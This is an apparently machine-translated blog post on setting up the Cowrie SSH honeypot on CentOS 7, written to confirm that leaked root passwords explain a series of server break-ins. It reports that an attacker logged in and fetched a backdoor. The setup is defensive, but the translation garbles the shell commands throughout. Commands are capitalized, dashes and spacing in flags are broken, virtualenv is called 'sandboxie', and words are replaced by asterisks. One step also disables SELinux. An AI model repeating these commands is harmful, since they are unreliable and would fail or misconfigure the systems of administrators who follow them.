Shulou(Shulou.com)06/01 Report--

Background

Recently, a number of servers have been hacked, and there are a large number of servers, which has a great impact. Basically, our servers have firewall policies, and the passwords are also complicated. At present, there is no particularly good idea to troubleshoot (because we have not done the relevant log collection or prepared the means in advance before. As a result, there is not much that can be done after something goes wrong, and the hacked machines are basically replaced with system commands, so there is even less that can be done.

When combing through the hacked server, it was found that the firewall of one server was turned off (maybe it was hacked off, maybe it was turned off all the time). Since there is no particularly good idea, let's first set up that this server was hacked first because its firewall was turned off, and then it was used as a springboard to hack other machines one after another. If this assumption is true, that is to say, our commonly used passwords have been included by the outside world. In order to prove this hypothesis, we need some tools. SSH honeypot is the best means of proof, there are many SSH honeypots, after some inspection, finally chose cowrie, in fact, it is not to say that it is the best of its kind, but to take a look at GitHub and find that they are all updated, while some of the other types have been updated for the last time several years ago.

Cowrie introduction

Http://www.cowrie.org/ official website, to tell you the truth, this page is really bad. There are very few things to see or very hidden. I can't find it.

Https://github.com/cowrie/cowrie this is the code hosting GitHub address, the content is OK.

Generally speaking, what we need this time is a SSH honeypot. What is a SSH honeypot? generally speaking, we use a program to simulate a SSH port service, let * think that it is a real SSH service, and then collect relevant information, such as IP, the account used to log in, what actions have been done after logging in, and so on.

Cowrie is rich in its ability to interface with mysql, elk, etc., and can do detailed * data analysis. This article only uses cowrie for verification of our hacked cases, so it only introduces the most basic and practical methods, but does not introduce detailed docking with third-party systems for the time being.

Cowrie installation

The installation method of cowrie is also a bit obscure, which is displayed without directly accessing the GitHub address. You need to manually access the INSTALL.md file of the GitHub address, the address is https://github.com/cowrie/cowrie/blob/master/INSTALL.md.

According to the official introduction, the installation environment should be Ubuntu, and the environment we use is centos 7.0. however, it is more or less the same. The specific installation steps and methods are pasted below. Only some of the official steps are referred to, but not all of them are carried out.

Install and configure cowrie

# install git python-virtualenv, sandboxie, gcc, etc

Yum install-y git python-virtualenv bzip2-devel libffi-devel gcc

# upgrade libcurl, or the git clone code may make an error later

Yum update-y nss curl libcurl

# create a cowrie user to run cowrie instead of using root directly, which is more secure

Adduser cowrie

Passwd cowrie

# enter the password, and then switch to the cowrie account

Su-cowrie

# git, pull down the cowrie code

Git clone http://github.com/cowrie/cowrie

# enter the cowrie directory after success

Cd cowrie

# cowrie relies on python's python virtualenv sandboxie, and supports python2 and python3. The centos 7.0 we use defaults to python 2.7, so we initialize it with version 2.7.

Virtualenv-python=python2 cowrie-env

# Activation

Source cowrie-env/bin/activate

# update pip first

Pip install-upgrade pip

# after updating pip, it's time to install the python libraries that cowrie depends on. Gcc compilers and libraries are needed here, so gcc has been installed beforehand.

Pip install-- upgrade-r requirements.txt

# if all goes well, configure the cowrie file and start cowrie now

# copy a cowrie configuration file and simulate SSH's root account first

# We use the default configuration file, and the default listening analog SSH port is 2222. Here, additional work is needed if it is changed to 22, because running in sandboxie, listening to port 22 requires authorization, so there is a bit of trouble here. We will use the default port 2222, and then use iptable port forwarding to forward port 22 to 2222. This is relatively simple.

Cp etc/cowrie.cfg.dist etc/cowrie.cfg

# create a simulated SSH root account file, because we want to verify that our internal password has been leaked, so we write down our suspected leaked root password. Only these root passwords can log on to our SSH honeypot.

Cat etc/userdb.txt

# the contents are as follows (regular, matching and other features are also supported, which are not available here):

Root:x: suspected disclosure of password 1

Root:x: suspected password disclosure 2

Root:x: suspected password disclosure 3

# once configured, let's start cowrie now

Bin/cowrie start

# after starting successfully, use the following command to see the running process, and use stop to shut down cowrie

Bin/cowrie status

Configure firewall policy

# now that the work of cowrie has been completed, the next step is to forward SSH port 22 to cowrie honeypot port 2222. Before that, let's change the default normal SSH service port from 22 to other ports, such as 7997

Vim / etc/ssh/sshd_config

# modify port

Port 7997

# disable selinux, otherwise modify the ssh port and restart the ssh service will fail

Setenforce 0

Service ssh restart

# release the 22 2222 tcp port so that everyone outside can access it, and join the iptable rule

-An INPUT-p tcp-- dport 22-j ACCEPT

-An INPUT-p tcp-- dport 2222-j ACCEPT

# Last step Port forwarding

Iptables-t nat-A PREROUTING-p tcp-- dport 22-j REDIRECT-- to-port 2222

Test # now let's verify whether cowrie serves ssh root@cowrie address # enter a password other than user.txt, if it is a login failure, it is normal # enter the built-in password in user.txt, and analyze normally if you can log in

The cowrie running log is placed in sandboxie's internal var/log/cowrie. By default, there are two formats: log is a normal log format, and json is a json log format. After running it for only one night, the problem was immediately found. The specific log content is as follows

You can see that outside * has successfully logged in with our internal password, and the following string is what we do after logging in, that is, download a backdoor software and delete it, which is consistent with our preset.

Here we also save all the pl files of * *, and put them in sandboxie's

Var/lib/cowrie/downloads/2438c584311c439b585075c68c443e2e96b43a826aaf42643d7808d436df3731

The log records entered by the command line terminal are placed in sandboxie's

Var/lib/cowrie/tty/1b54104347e987372b323bc6701625889cc01b8de2ce13bc9a297f1f620b5140

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.